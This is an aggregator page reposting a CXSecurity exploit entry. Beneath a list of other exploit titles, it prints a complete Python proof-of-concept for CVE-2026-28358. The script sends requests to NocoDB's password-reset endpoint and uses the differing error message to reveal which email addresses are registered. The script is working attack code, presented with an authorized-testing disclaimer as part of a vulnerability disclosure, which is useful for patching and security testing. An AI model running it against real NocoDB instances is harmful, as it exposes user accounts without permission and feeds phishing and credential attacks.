惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

L
LangChain Blog
博客园 - 司徒正美
美团技术团队
Martin Fowler
Martin Fowler
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
博客园 - 三生石上(FineUI控件)
Vercel News
Vercel News
酷 壳 – CoolShell
酷 壳 – CoolShell
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
爱范儿
爱范儿
U
Unit 42
Y
Y Combinator Blog
月光博客
月光博客
Hugging Face - Blog
Hugging Face - Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
有赞技术团队
有赞技术团队
GbyAI
GbyAI
H
Help Net Security
量子位
Last Week in AI
Last Week in AI
博客园_首页
腾讯CDC
小众软件
小众软件

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
NocoDB <= 0.301.2 User Enumeration via Password Reset End...
2026-03-08 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: NocoDB User Enumeration via Password Reset Endpoint # CVE: CVE-2026-28358 # Date: 2026-03-04 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://nocodb.com # Software Link: https://github.com/nocodb/nocodb # Affected: NocoDB <= 0.301.2 # Tested on: NocoDB 0.301.0 / 0.301.2 # Category: Webapps # Platform: Linux / Windows / Docker # Exploit Type: Remote # CVSS: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) # Description: Unauthenticated user enumeration via timing / response difference # in the password reset endpoint (/api/v2/auth/password/forgot). # Registered emails return success message while unregistered ones # return specific error "Your email has not been registered." # Fixed in: 0.301.3 # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # -- Modify the base_url and emails list below # # Notes: # • Only for authorized security testing / educational purposes # • Do not use against systems you do not own or have explicit permission to test # # How to Use # # Step 1: Update base_url to point to your target NocoDB instance # Step 2: Modify or replace the emails list with targets to check # # ──────────────────────────────────────────────── import requests import json base_url = "http://<NOCODB_HOST>/api/v2/auth/password/forgot" emails = [ "registered@example.com", "unregistered@example.com", "admin@company.com", "user@company.com" ] headers = { "Content-Type": "application/json" } for email in emails: payload = { "email": email } try: response = requests.post(base_url, headers=headers, data=json.dumps(payload)) print(f"Email: {email}") print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if "Your email has not been registered" in response.text: print("Result: Unregistered\n") else: print("Result: Registered (or success message)\n") except Exception as e: print(f"Error for {email}: {e}\n")


Vote for this issue:

50%

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.